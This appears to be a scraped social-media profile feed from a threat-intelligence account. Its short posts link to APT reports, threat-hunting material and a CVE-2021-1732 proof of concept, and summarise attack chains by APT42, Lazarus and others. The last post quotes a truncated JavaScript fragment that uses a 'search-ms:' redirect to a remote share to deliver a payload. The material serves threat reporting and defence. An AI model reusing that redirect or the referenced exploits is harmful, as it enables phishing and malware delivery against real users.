Pinned
Preparing for the 2026 report
github.com/blackorbird/AP…
blackorbird
3,531 posts
blackorbird
@blackorbird
- THREAT HUNTING PLAYBOOK LEARN HOW TO EMBRACE A PROACTIVE SECURITY POSTURE github.com/blackorbird/AP…
- GPTs for Cybersecurity Collection github.com/fr0gger/Awesom…
- CVE-2021-1732 Exploit Windows Win32k Elevation of Privilege Vulnerability github.com/KaLendsi/CVE-2… Poc & Exp report: bbs.pediy.com/thread-266362.…
- CrowdStrike 2025 Threat Hunting Report github.com/blackorbird/AP…
- #APT42 Uses fake conference pages to capture credentials, redirects to OneDrive WebDAV shares, downloads LNK files disguised as PDFs, executes curl commands to fetch batch scripts (Temp.bat) from Cloudflare Workers, and loads the PowerShell-based TAMECAT backdoor: A modular,
- How Hackers Use Vector Graphics(.svg) for Phishing Attacks seqrite.com/blog/unmasking…
- #Lazarus exploited a flaw in the Windows AppLocker driver (appid.sys) as a zero-day to gain kernel-level access and turn off security tools.CVE-2024-21338 Beyond BYOVD with an Admin-to-Kernel Zero-Day decoded.avast.io/janvojtesek/la…
- Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400) 172.233.228[.]93 volexity.com/blog/2024/04/1…
- The Hacking Team is back/Operation ForumTroll Phishing link → WebGPU decrypt → Shellcode injection → COM hijack for persistence. Deploys Dante spyware (successor to RCS(Hacking Team), now Memento Labs) + custom LeetAgent for keylogging, file theft. Exploits: Zero-days
- Phishing emails making use of the "search-ms" URI protocol handler to download malicious payload. trellix.com/en-us/about/ne… ClickOnce APT Group also use these technology. <script> window.location.href = 'search-ms:query=Review&crumb=location: \\\\domain@SSL\
